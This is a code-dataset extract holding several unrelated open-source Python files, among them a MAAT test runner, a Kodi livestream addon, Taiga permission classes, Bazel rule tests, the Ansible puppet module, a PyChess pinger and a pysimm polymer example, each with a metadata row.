timeout=expiry, helper_class=_ReportQuickCache)
| bsd-3-clause | -2,381,033,371,840,866,300 | 29.466667 | 79 | 0.641138 | false |
hcasse/maat | maat/test.py | 1 | 9061 | # MAAT top-level script
# Copyright (C) 2016 H. Casse <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Module providing test services."""
import difflib
import os
import os.path
import shutil
import subprocess
import sys
import maat
from maat import action
from maat import common
from maat import env
from maat import io
from maat import recipe
TEST_CASES = []
BEFORE_TEST = []
NULL = open(os.devnull, "w")
class Case(recipe.Recipe):
"""Recipe to implement test case."""
name = None
tests = None
succeeded = 0
longer = 0
def __init__(self, name, deps, private):
recipe.Recipe.__init__(self, [maat.path(name)], deps)
self.tests = []
self.name = name
recipe.get_file(name).set_goal()
if not private:
global TEST_CASES
TEST_CASES.append(self.ress[0])
self.ress[0].DESCRIPTION = "test case"
def add(self, test):
self.tests.append(test)
self.deps = self.deps + test.deps
self.longer = max(self.longer, len(test.name))
def action(self, ctx):
#ctx.print_info("Testing %s" % self.ress[0])
self.succeeded = 0
for test in self.tests:
test.test(ctx)
if self.succeeded == len(self.tests):
ctx.out.write(io.BOLD + io.GREEN + "\tSUCCESS: all tests passed!\n" + io.NORMAL)
else:
ctx.out.write(io.BOLD + io.RED + "\tFAILURE: %d test(s) failed on %d\n" % (len(self.tests) - self.succeeded, len(self.tests)) + io.NORMAL)
common.error("Test failed.")
class Test(recipe.Recipe):
"""Implements a simple test, that is, perform its action
and depending on the result increment succeeded counter
of test case."""
case = None
name = None
def __init__(self, case, name, deps):
recipe.Recipe.__init__(self, [name], deps)
self.name = name
recipe.get_file(name).set_phony()
self.case = case
case.add(self)
self.ress[0].set_goal()
self.ress[0].DESCRIPTION = "test"
def action(self, ctx):
"""Default action for a test."""
self.test(ctx)
def success(self, ctx):
"""Record the current test as a success and display
ok message."""
self.case.succeeded += 1
ctx.print_action_success()
def failure(self, ctx, msg = ""):
"""Record the current test as a failure display message."""
ctx.print_action_failure(msg)
def perform(self, ctx):
"""Display message of a starting test."""
ctx.print_action("\tTesting %s%s " % (self.name, ' ' * (self.case.longer - len(self.name))))
def info(self, ctx, msg):
"""Display an information."""
ctx.print_info("\t\t%s" % msg)
def test(self, ctx):
"""This method is called to perform the test."""
pass
class OutputTest(Test):
"""Test launching a command, storing the output and/or error
stream and comparing it to expected output. Fails if there
is a difference.
Constructor takes as parameter the file to compare output stream
and the file to compare error stream with. Matching channels are
ignored if they get a value of None.
An input stream may also be passed and the matching file will
dumped to input of launched command."""
def __init__(self, case, name, cmd, out = None, out_ref = None, err = None, err_ref = None, input = None, deps = None):
Test.__init__(self, case, name, deps)
self.cmd = cmd
self.out = maat.path(out)
self.out_ref = maat.path(out_ref)
self.err = maat.path(err)
self.err_ref = maat.path(err_ref)
self.input = input
def test(self, ctx):
self.perform(ctx)
try:
# launch the command
if self.out:
self.out.parent().makedir()
out_stream = open(str(self.out), "w")
else:
out_stream = NULL
if self.err:
self.err.parent().makedir()
err_stream = open(str(self.err), "w")
else:
err_stream = NULL
if self.input:
in_stream = open(str(self.input), "r")
else:
in_stream = NULL
cmd = action.make_line(self.cmd)
if maat.verbose:
ctx.print_info("running '%s'" % cmd)
rc = subprocess.call(cmd, stdin = in_stream, stdout = out_stream, stderr = err_stream, shell = True)
if rc != 0:
self.failure(ctx, "return code = %d, command = %s" % (rc, cmd))
return
# compare output if any
if self.out:
if not self.out_ref.exists():
self.info(ctx, "no reference file for output, creating it!")
maat.mkdir(str(self.out_ref.parent()))
shutil.copyfile(str(self.out), str(self.out_ref))
else:
out = str(self.out)
ref = str(self.out_ref)
rc = subprocess.call("diff --brief %s %s " % (ref, out), stdout = NULL, stderr = NULL, shell = True)
if rc != 0:
self.failure(ctx, "different output stream")
return
# compare error if any
if self.err:
if not self.err_ref.exists():
self.info(ctx, "no reference file for error, creating it!")
maat.mkdir(str(self.err_ref.parent()))
shutil.copyfile(str(self.err), str(self.err_ref))
else:
err = str(self.err)
ref = str(self.err_ref)
rc = subprocess.call("diff --brief %s %s" % (ref, err), stdout = NULL, stderr = NULL, shell = True)
if rc != 0:
self.failure(ctx, "different error stream")
return
# display result
self.success(ctx)
except OSError as e:
self.failure(ctx, "test error: %s" % e)
except IOError as e:
self.failure(ctx, "test error: %s" % e)
class CommandTest(Test):
"""A command test just run a command and examine the return code.
If the return code is 0, the test is passed. Else the test is
considered as failed."""
def __init__(self, case, name, args, out = None, err = None, inp = None, deps = None, dir = None):
if dir != None:
deps = common.as_list(deps) + [ dir ]
Test.__init__(self, case, name, deps)
self.args = args
self.inp = inp
self.out = out
self.err = err
self.dir = dir
def check(self, rc):
return rc == 0
def test(self, ctx):
self.perform(ctx)
if self.dir != None:
old_dir = os.getcwd()
try:
os.chdir(self.dir)
except OSError as e:
raise common.MaatError("cannot change to '%s': %s" % (self.dir, e))
if self.out:
out = common.Path(self.out)
maat.mkdir(str(out.parent()))
out_stream = open(str(out), "w")
else:
out_stream = NULL
if self.err:
err = common.Path(self.err)
maat.mkdir(str(err.parent()))
err_stream = open(str(err), "w")
else:
err_stream = NULL
if self.inp:
in_stream = open(str(self.input), "r")
else:
in_stream = NULL
cmd = action.make_line(self.args)
if maat.verbose:
ctx.print_info("running %s" % cmd)
rc = subprocess.call(cmd, stdin = in_stream, stdout = out_stream, stderr = err_stream, shell = True)
if self.check(rc):
self.success(ctx)
else:
self.failure(ctx, "return code = %d, command = %s" % (rc, cmd))
if self.dir != None:
os.chdir(old_dir)
class FailingCommandTest(CommandTest):
"""Test launching a command and that succeed if the command fails."""
def __init__(self, case, name, args, out = None, err = None, inp = None, deps = None, dir = None):
CommandTest.__init__(self, case, name, args, out, err, inp, deps, dir)
def check(self, rc):
return rc != 0
def case(name, deps = None, private = False):
"""Build a test a case, that is, an abstract goal
with a recipe launching tests. If private is to True, the case
is not added to the global list of test cases."""
return Case(name, deps, private)
def command(case, name, args, out = None, err = None, inp = None, deps = None, dir = None):
"""Build a command test that run the command and examine return code."""
return CommandTest(case, name, args, out, err, inp, deps, dir)
def failing_command(case, name, args, out = None, err = None, inp = None, deps = None, dir = None):
"""Build a command test that run the command and check from the return code if the command failed."""
return FailingCommandTest(case, name, args, out, err, inp, deps)
def output(case, name, cmd, out = None, out_ref = None, err = None, err_ref = None, input = None, deps = []):
"""Build a test that launches a command compares output."""
return OutputTest(case, name, cmd, out, out_ref, err, err_ref, input, deps)
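# Illustrative usage of the helpers above (target and file names are hypothetical):
#
#   suite = case("regression")
#   command(suite, "shows-help", "mytool --help")
#   output(suite, "basic-run", "mytool data/in.txt",
#          out="out/basic.txt", out_ref="ref/basic.txt")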
def before(*actions):
"""Add an action to actions performed before test."""
BEFORE_TEST.append(action.make_actions(*actions))
def post_init():
"""Initialize the test goal."""
path = env.cur.path / "test"
if path not in recipe.file_db:
before_test = recipe.phony("before-test", [], action.make_actions(BEFORE_TEST))
test = maat.goal("test", [before_test] + TEST_CASES)
test.DESCRIPTION = "run tests"
common.post_inits.append(common.FunDelegate(post_init))
| gpl-3.0 | 5,791,492,022,271,630,000 | 30.030822 | 141 | 0.65964 | false |
gion86/awlsim | awlsim/core/instructions/insn_feature.py | 2 | 1866 | # -*- coding: utf-8 -*-
#
# AWL simulator - instructions
#
# Copyright 2012-2014 Michael Buesch <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from __future__ import division, absolute_import, print_function, unicode_literals
from awlsim.common.compat import *
from awlsim.core.instructions.main import * #@nocy
from awlsim.core.operators import *
#from awlsim.core.instructions.main cimport * #@cy
class AwlInsn_FEATURE(AwlInsn): #+cdef
__slots__ = ()
def __init__(self, cpu, rawInsn):
AwlInsn.__init__(self, cpu, AwlInsn.TYPE_FEATURE, rawInsn)
self.assertOpCount((1, 2))
def run(self):
#@cy cdef S7StatusWord s
target = self.cpu.fetch(self.ops[0])
value = None
if len(self.ops) >= 2:
value = self.cpu.fetch(self.ops[1])
if target == 0:
# Set/get the number of accumulator registers.
if value is not None:
self.cpu.specs.setNrAccus(value)
self.cpu.accu1.set(self.cpu.specs.nrAccus)
elif target == 1:
# Set/get the enable-status of OB-temp writing.
if value is not None:
self.cpu.enableObTempPresets(value)
self.cpu.accu1.set(int(self.cpu.obTempPresetsEnabled()))
else:
raise AwlSimError("Unsupported __FEATURE target %d" % target)
| gpl-2.0 | -1,157,801,609,826,151,000 | 31.736842 | 82 | 0.722937 | false |
timrijckaert/plugin.video.vrt.livestreams | addon.py | 1 | 3408 | import sys
import xbmc
import xbmcgui
import xbmcplugin
from resources.lib.models.constants import ACTIONS
from resources.lib.models.radiochannel import get_all_radio_channels
from resources.lib.models.videochannel import get_all_video_channels
from resources.lib.service.playlistfetcher import get_playlist_for_channel
from resources.lib.utils.debugger import Debugger
from resources.lib.utils.utils import Utils
self = sys.argv[0]
addon_handle = int(sys.argv[1])
qs = sys.argv[2]
def get_radio_list_items():
radio_items = []
for channel in get_all_radio_channels():
live_stream_title = channel.title
live_stream_url = utils.create_qs(self, {
'action': ACTIONS["radio_list_item_clicked"],
'url': channel.url,
'channel_code': channel.channel_code
})
list_item = xbmcgui.ListItem(label=live_stream_title,
label2=channel.description,
iconImage=channel.thumbnail_picture,
thumbnailImage=channel.thumbnail_picture,
path=live_stream_url)
list_item.setProperty("fanart_image", channel.fanart_picture)
radio_items.append((live_stream_url, list_item))
return radio_items
def get_video_list_items():
video_items = []
for channel in get_all_video_channels():
live_stream_title = channel.title
live_stream_url = channel.video_url
list_item = xbmcgui.ListItem(label=live_stream_title,
iconImage=channel.thumbnail_picture,
thumbnailImage=channel.thumbnail_picture,
path=live_stream_url)
list_item.setInfo(type='video', infoLabels={"title": live_stream_title})
list_item.setProperty("fanart_image", channel.fanart_picture)
list_item.setProperty("isPlayable", 'true')
video_items.append((live_stream_url, list_item))
return video_items
def display_generic_playable_items(items):
xbmcplugin.addDirectoryItems(handle=addon_handle, items=items, totalItems=len(items))
xbmcplugin.endOfDirectory(addon_handle, True)
if __name__ == "__main__":
utils = Utils()
debugger = Debugger()
if len(qs) > 1:
action = utils.get_action(qs)
xbmc.log("Action %s" % action)
if action is None:
if utils.content_type == 'video':
display_generic_playable_items(get_video_list_items())
else:
display_generic_playable_items(get_radio_list_items())
if action == ACTIONS["radio_list_item_clicked"]:
xbmc.Player().play(utils.url)
playlist_for_channel = get_playlist_for_channel(utils.channel_code)
songs = playlist_for_channel.songs
play_list = xbmc.PlayList(xbmc.PLAYLIST_MUSIC)
play_list.clear()
play_list.unshuffle()
if len(songs) > 0:
for song in songs:
play_list.add(url=utils.construct_known_params(self),
listitem=xbmcgui.ListItem(label="%s - %s" % (song.artist, song.title),
label2=song.artist,
iconImage=song.image_url,
thumbnailImage=song.image_url))
| gpl-2.0 | 921,547,563,464,623,200 | 38.627907 | 100 | 0.595951 | false |
dycodedev/taiga-back | taiga/projects/tasks/permissions.py | 8 | 2315 | # Copyright (C) 2014 Andrey Antukh <[email protected]>
# Copyright (C) 2014 Jesús Espino <[email protected]>
# Copyright (C) 2014 David Barragán <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from taiga.base.api.permissions import (TaigaResourcePermission, HasProjectPerm,
IsAuthenticated, IsProjectOwner, AllowAny,
IsSuperUser)
class TaskPermission(TaigaResourcePermission):
enought_perms = IsProjectOwner() | IsSuperUser()
global_perms = None
retrieve_perms = HasProjectPerm('view_tasks')
create_perms = HasProjectPerm('add_task')
update_perms = HasProjectPerm('modify_task')
partial_update_perms = HasProjectPerm('modify_task')
destroy_perms = HasProjectPerm('delete_task')
list_perms = AllowAny()
csv_perms = AllowAny()
bulk_create_perms = HasProjectPerm('add_task')
bulk_update_order_perms = HasProjectPerm('modify_task')
upvote_perms = IsAuthenticated() & HasProjectPerm('view_tasks')
downvote_perms = IsAuthenticated() & HasProjectPerm('view_tasks')
watch_perms = IsAuthenticated() & HasProjectPerm('view_tasks')
unwatch_perms = IsAuthenticated() & HasProjectPerm('view_tasks')
class TaskVotersPermission(TaigaResourcePermission):
enought_perms = IsProjectOwner() | IsSuperUser()
global_perms = None
retrieve_perms = HasProjectPerm('view_tasks')
list_perms = HasProjectPerm('view_tasks')
class TaskWatchersPermission(TaigaResourcePermission):
enought_perms = IsProjectOwner() | IsSuperUser()
global_perms = None
retrieve_perms = HasProjectPerm('view_tasks')
list_perms = HasProjectPerm('view_tasks')
| agpl-3.0 | -350,722,921,183,585,900 | 44.352941 | 82 | 0.721141 | false |
safarmer/bazel | tools/build_rules/test_rules_test.py | 13 | 5024 | # Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from src.test.py.bazel import test_base
class TestRulesTest(test_base.TestBase):
def _FailWithOutput(self, output):
self.fail('FAIL:\n | %s\n---' % '\n | '.join(output))
def _AssertPasses(self, target):
exit_code, stdout, stderr = self.RunBazel(
['test', target, '--test_output=errors'])
if exit_code != 0:
self._FailWithOutput(stdout + stderr)
def _AssertFails(self, target):
exit_code, stdout, stderr = self.RunBazel(['test', target])
if exit_code == 0:
self._FailWithOutput(stdout + stderr)
def testContent(self):
self.ScratchFile('WORKSPACE')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules.bzl'),
'foo/test_rules.bzl')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules_private.bzl'),
'foo/test_rules_private.bzl')
self.ScratchFile('foo/tested_file.txt',
['The quick brown', 'fox jumps over', 'the lazy dog.'])
self.ScratchFile('foo/BUILD', [
'load(":test_rules.bzl", "file_test")',
'',
'file_test(',
' name = "pos",',
' content = "The quick brown\\nfox jumps over\\nthe lazy dog.\\n",',
' file = "tested_file.txt",',
')',
'',
'file_test(',
' name = "neg",',
' content = "quick",',
' file = "tested_file.txt",',
')',
])
self._AssertPasses('//foo:pos')
self._AssertFails('//foo:neg')
def testRegexpWithoutMatches(self):
self.ScratchFile('WORKSPACE')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules.bzl'),
'foo/test_rules.bzl')
self.ScratchFile('foo/tested_file.txt',
['The quick brown', 'fox jumps over', 'the lazy dog.'])
self.ScratchFile('foo/BUILD', [
'load(":test_rules.bzl", "file_test")',
'',
'file_test(',
' name = "pos",',
' file = "tested_file.txt",',
' regexp = "o[vwx]",',
')',
'',
'file_test(',
' name = "neg",',
' file = "tested_file.txt",',
' regexp = "o[abc]",',
')',
])
self._AssertPasses('//foo:pos')
self._AssertFails('//foo:neg')
def testRegexpWithMatches(self):
self.ScratchFile('WORKSPACE')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules.bzl'),
'foo/test_rules.bzl')
self.ScratchFile('foo/tested_file.txt',
['The quick brown', 'fox jumps over', 'the lazy dog.'])
self.ScratchFile(
'foo/BUILD',
[
'load(":test_rules.bzl", "file_test")',
'',
'file_test(',
' name = "pos",',
' file = "tested_file.txt",',
# grep -c returns the number of matching lines, not the number of
# matches
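            # e.g. "fox jumps over" contains two matches ("ox", "ov") but
            # grep -c counts it as a single matching line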
' matches = 2,',
' regexp = "o[vwx]",',
')',
'',
'file_test(',
' name = "neg",',
' file = "tested_file.txt",',
' matches = 3,',
' regexp = "o[vwx]",',
')',
])
self._AssertPasses('//foo:pos')
self._AssertFails('//foo:neg')
def testBadArgs(self):
self.ScratchFile('WORKSPACE')
self.CopyFile(
self.Rlocation('io_bazel/tools/build_rules/test_rules.bzl'),
'foo/test_rules.bzl')
self.ScratchFile('foo/tested_file.txt',
['The quick brown', 'fox jumps over', 'the lazy dog.'])
self.ScratchFile('foo/BUILD', [
'load(":test_rules.bzl", "file_test")',
'',
'file_test(',
' name = "neither_content_nor_regex",',
' file = "tested_file.txt",',
')',
'',
'file_test(',
' name = "both_content_and_regex",',
' file = "tested_file.txt",',
' content = "x",',
' regexp = "x",',
')',
'',
'file_test(',
' name = "content_with_matches",',
' file = "tested_file.txt",',
' content = "hello",',
' matches = 1,',
')',
])
self._AssertFails('//foo:neither_content_nor_regex')
self._AssertFails('//foo:both_content_and_regex')
self._AssertFails('//foo:content_with_matches')
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 9,204,501,319,727,431,000 | 31.412903 | 79 | 0.52926 | false |
e-gob/plataforma-kioscos-autoatencion | scripts/ansible-play/.venv/lib/python2.7/site-packages/ansible/modules/system/puppet.py | 25 | 8786 | #!/usr/bin/python
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: puppet
short_description: Runs puppet
description:
- Runs I(puppet) agent or apply in a reliable manner
version_added: "2.0"
options:
timeout:
description:
- How long to wait for I(puppet) to finish.
required: false
default: 30m
puppetmaster:
description:
- The hostname of the puppetmaster to contact.
required: false
default: None
modulepath:
description:
- Path to an alternate location for puppet modules
required: false
default: None
version_added: "2.4"
manifest:
description:
- Path to the manifest file to run puppet apply on.
required: false
default: None
facts:
description:
- A dict of values to pass in as persistent external facter facts
required: false
default: None
facter_basename:
description:
- Basename of the facter output file
required: false
default: ansible
environment:
description:
- Puppet environment to be used.
required: false
default: None
logdest:
description:
- Where the puppet logs should go, if puppet apply is being used
required: false
default: stdout
choices: [ 'stdout', 'syslog' ]
version_added: "2.1"
certname:
description:
- The name to use when handling certificates.
required: false
default: None
version_added: "2.1"
tags:
description:
- A comma-separated list of puppet tags to be used.
required: false
default: None
version_added: "2.1"
execute:
description:
- Execute a specific piece of Puppet code. It has no effect with
a puppetmaster.
required: false
default: None
version_added: "2.1"
requirements: [ puppet ]
author: "Monty Taylor (@emonty)"
'''
EXAMPLES = '''
# Run puppet agent and fail if anything goes wrong
- puppet
# Run puppet and timeout in 5 minutes
- puppet:
timeout: 5m
# Run puppet using a different environment
- puppet:
environment: testing
# Run puppet using a specific certname
- puppet:
certname: agent01.example.com
# Run puppet using a specific piece of Puppet code. Has no effect with a
# puppetmaster.
- puppet:
execute: 'include ::mymodule'
# Run puppet using a specific tags
- puppet:
tags: update,nginx
'''
import json
import os
import pipes
import stat
from ansible.module_utils.basic import AnsibleModule
def _get_facter_dir():
if os.getuid() == 0:
return '/etc/facter/facts.d'
else:
return os.path.expanduser('~/.facter/facts.d')
def _write_structured_data(basedir, basename, data):
if not os.path.exists(basedir):
os.makedirs(basedir)
file_path = os.path.join(basedir, "{0}.json".format(basename))
# This is more complex than you might normally expect because we want to
# open the file with only u+rw set. Also, we use the stat constants
# because ansible still supports python 2.4 and the octal syntax changed
out_file = os.fdopen(
os.open(
file_path, os.O_CREAT | os.O_WRONLY,
stat.S_IRUSR | stat.S_IWUSR), 'w')
out_file.write(json.dumps(data).encode('utf8'))
out_file.close()
def main():
module = AnsibleModule(
argument_spec=dict(
timeout=dict(default="30m"),
puppetmaster=dict(required=False, default=None),
modulepath=dict(required=False, default=None),
manifest=dict(required=False, default=None),
logdest=dict(
required=False, default='stdout',
choices=['stdout', 'syslog']),
show_diff=dict(
# internal code to work with --diff, do not use
default=False, aliases=['show-diff'], type='bool'),
facts=dict(default=None, type='dict'),
facter_basename=dict(default='ansible'),
environment=dict(required=False, default=None),
certname=dict(required=False, default=None),
tags=dict(required=False, default=None, type='list'),
execute=dict(required=False, default=None),
),
supports_check_mode=True,
mutually_exclusive=[
('puppetmaster', 'manifest'),
('puppetmaster', 'manifest', 'execute'),
('puppetmaster', 'modulepath')
],
)
p = module.params
global PUPPET_CMD
PUPPET_CMD = module.get_bin_path("puppet", False, ['/opt/puppetlabs/bin'])
if not PUPPET_CMD:
module.fail_json(
msg="Could not find puppet. Please ensure it is installed.")
global TIMEOUT_CMD
TIMEOUT_CMD = module.get_bin_path("timeout", False)
if p['manifest']:
if not os.path.exists(p['manifest']):
module.fail_json(
msg="Manifest file %(manifest)s not found." % dict(
manifest=p['manifest']))
# Check if puppet is disabled here
if not p['manifest']:
rc, stdout, stderr = module.run_command(
PUPPET_CMD + " config print agent_disabled_lockfile")
if os.path.exists(stdout.strip()):
module.fail_json(
msg="Puppet agent is administratively disabled.",
disabled=True)
elif rc != 0:
module.fail_json(
msg="Puppet agent state could not be determined.")
if module.params['facts'] and not module.check_mode:
_write_structured_data(
_get_facter_dir(),
module.params['facter_basename'],
module.params['facts'])
if TIMEOUT_CMD:
base_cmd = "%(timeout_cmd)s -s 9 %(timeout)s %(puppet_cmd)s" % dict(
timeout_cmd=TIMEOUT_CMD,
timeout=pipes.quote(p['timeout']),
puppet_cmd=PUPPET_CMD)
else:
base_cmd = PUPPET_CMD
if not p['manifest'] and not p['execute']:
cmd = ("%(base_cmd)s agent --onetime"
" --ignorecache --no-daemonize --no-usecacheonfailure --no-splay"
" --detailed-exitcodes --verbose --color 0") % dict(
base_cmd=base_cmd,
)
if p['puppetmaster']:
cmd += " --server %s" % pipes.quote(p['puppetmaster'])
if p['show_diff']:
cmd += " --show_diff"
if p['environment']:
cmd += " --environment '%s'" % p['environment']
if p['tags']:
cmd += " --tags '%s'" % ','.join(p['tags'])
if p['certname']:
cmd += " --certname='%s'" % p['certname']
if module.check_mode:
cmd += " --noop"
else:
cmd += " --no-noop"
else:
cmd = "%s apply --detailed-exitcodes " % base_cmd
if p['logdest'] == 'syslog':
cmd += "--logdest syslog "
if p['modulepath']:
cmd += "--modulepath='%s'" % p['modulepath']
if p['environment']:
cmd += "--environment '%s' " % p['environment']
if p['certname']:
cmd += " --certname='%s'" % p['certname']
if p['tags']:
cmd += " --tags '%s'" % ','.join(p['tags'])
if module.check_mode:
cmd += "--noop "
else:
cmd += "--no-noop "
if p['execute']:
cmd += " --execute '%s'" % p['execute']
else:
cmd += pipes.quote(p['manifest'])
rc, stdout, stderr = module.run_command(cmd)
if rc == 0:
# success
module.exit_json(rc=rc, changed=False, stdout=stdout, stderr=stderr)
elif rc == 1:
# rc==1 could be because it's disabled
# rc==1 could also mean there was a compilation failure
disabled = "administratively disabled" in stdout
if disabled:
msg = "puppet is disabled"
else:
msg = "puppet did not run"
module.exit_json(
rc=rc, disabled=disabled, msg=msg,
error=True, stdout=stdout, stderr=stderr)
elif rc == 2:
# success with changes
module.exit_json(rc=0, changed=True, stdout=stdout, stderr=stderr)
elif rc == 124:
# timeout
module.exit_json(
rc=rc, msg="%s timed out" % cmd, stdout=stdout, stderr=stderr)
else:
# failure
module.fail_json(
rc=rc, msg="%s failed with return code: %d" % (cmd, rc),
stdout=stdout, stderr=stderr)
if __name__ == '__main__':
main()
| bsd-3-clause | 3,229,730,367,233,816,600 | 29.61324 | 92 | 0.57751 | false |
pychess/pychess | lib/pychess/System/ping.py | 1 | 2987 | # -*- coding: UTF-8 -*-
import re
import sys
import shutil
from gi.repository import GObject
from pychess.compat import create_task
from pychess.System.Log import log
from pychess.System.SubProcess import SubProcess
class Pinger(GObject.GObject):
""" The received signal contains the time it took to get response from the
server in millisecconds. -1 means that some error occurred """
__gsignals__ = {
"received": (GObject.SignalFlags.RUN_FIRST, None, (float, )),
"error": (GObject.SignalFlags.RUN_FIRST, None, (str, ))
}
def __init__(self, host):
GObject.GObject.__init__(self)
self.host = host
self.subproc = None
self.expression = re.compile(r"=([\d\.]+) (m?s)")
# We need untranslated error messages in regexp search
# below, so have to use deferred translation here
def _(msg):
return msg
error = _("Destination Host Unreachable")
self.errorExprs = (re.compile("(%s)" % error), )
del _
self.restartsOnDead = 3
self.deadCount = 0
def start(self):
assert not self.subproc
if sys.platform == "win32":
args = ["-t", self.host]
else:
args = ["-i10", self.host]
self.subproc = SubProcess(shutil.which("ping"), args, env={"LANG": "en"})
create_task(self.subproc.start())
self.conid1 = self.subproc.connect("line", self.__handleLines)
self.conid2 = self.subproc.connect("died", self.__handleDead)
def __handleLines(self, subprocess, line):
match = self.expression.search(line)
if match:
time, unit = match.groups()
time = float(time)
if unit == "s":
time *= 1000
self.emit("received", time)
else:
for expr in self.errorExprs:
match = expr.search(line)
if match:
msg = match.groups()[0]
self.emit("error", _(msg))
def __handleDead(self, subprocess):
if self.deadCount < self.restartsOnDead:
log.warning("Pinger died and restarted (%d/%d)" %
(self.deadCount + 1, self.restartsOnDead),
extra={"task": self.subproc.defname})
self.stop()
self.start()
self.deadCount += 1
else:
self.emit("error", _("Died"))
self.stop()
def stop(self):
if not self.subproc:
return
# exitCode = self.subproc.gentleKill()
self.subproc.disconnect(self.conid1)
self.subproc.disconnect(self.conid2)
self.subproc.terminate()
self.subproc = None
if __name__ == "__main__":
pinger = Pinger("google.com")
def callback(pinger, time):
print(time)
pinger.connect("received", callback)
pinger.start()
import time
time.sleep(5)
pinger.stop()
time.sleep(3)
| gpl-3.0 | -185,132,185,501,466,400 | 28.574257 | 81 | 0.556076 | false |
polysimtools/pysimm | Examples/04_polyethylene/gaff2/create.py | 3 | 2276 | from pysimm import system, lmps, forcefield
from pysimm.apps.random_walk import random_walk
from pysimm.models.monomers.gaff2.pe import monomer
def run(test=False):
# we'll create a pe monomer from the pysimm.models database
pe = monomer()
# we'll instantiate a GAFF2 forcefield object for use later
f = forcefield.Gaff2()
# the monomers do not have any charges, so we will derive partial charges using the gasteiger algorithm
pe.apply_charges(f, charges='gasteiger')
# run the random_walk polymerization method making a chain of 10 repeat units
# the forcefield object is supplied to get new forcefield types not in the monomer system
polymer = random_walk(pe, 10, forcefield=f)
# write a few different file formats
polymer.write_xyz('polymer.xyz')
polymer.write_yaml('polymer.yaml')
polymer.write_lammps('polymer.lmps')
polymer.write_chemdoodle_json('polymer.json')
# if you want to restart a polymerization, the yaml file format retains linker information
# random_walk looks for the last head and tail linkers, so just run a copolymerization with the original polymer chain and new monomers
# we give the copolymer function a list of reference "monomers", but use the first polymer chain as the first "monomer" and only insert one
# then we use the pattern argument to define how many of each "monomers" to add. Let's add 5 more monomers to our chain
# first import the copolymer function
from pysimm.apps.random_walk import copolymer
# now read in the yaml file we saved after making our first polymer
original_polymer = system.read_yaml('polymer.yaml')
# we can use our original polyethylene monomer because it doesn't get modified during polymerization
# the total number of monomers we're adding is 6, 1 for the original polymer chain, and 5 for our new monomers
longer_polymer = copolymer([original_polymer, pe], 6, pattern=[1, 5], forcefield=f)
longer_polymer.write_xyz('longer_polymer.xyz')
longer_polymer.write_yaml('longer_polymer.yaml')
longer_polymer.write_lammps('longer_polymer.lmps')
longer_polymer.write_chemdoodle_json('longer_polymer.json')
if __name__ == '__main__':
run() | mit | 6,607,197,273,273,481,000 | 45.469388 | 143 | 0.720562 | false |
jakirkham/dask-distance | setup.py | 1 | 1828 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import setuptools
from setuptools import setup
from setuptools.command.test import test as TestCommand
import versioneer
class PyTest(TestCommand):
description = "Run test suite with pytest"
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
sys.exit(pytest.main(self.test_args))
with open("README.rst") as readme_file:
readme = readme_file.read()
requirements = [
"dask",
"numpy",
]
test_requirements = [
"pytest",
"scipy",
]
cmdclasses = {
"test": PyTest,
}
cmdclasses.update(versioneer.get_cmdclass())
setup(
name="dask-distance",
version=versioneer.get_version(),
description=(
"Distance computations with Dask (akin to scipy.spatial.distance)"
),
long_description=readme,
author="John Kirkham",
author_email="[email protected]",
url="https://github.com/jakirkham/dask-distance",
cmdclass=cmdclasses,
packages=setuptools.find_packages(exclude=["tests*"]),
include_package_data=True,
install_requires=requirements,
license="BSD 3-Clause",
zip_safe=False,
keywords="dask-distance",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Natural Language :: English",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
],
tests_require=test_requirements
)
| bsd-3-clause | -8,600,454,990,359,348,000 | 23.702703 | 74 | 0.637856 | false |
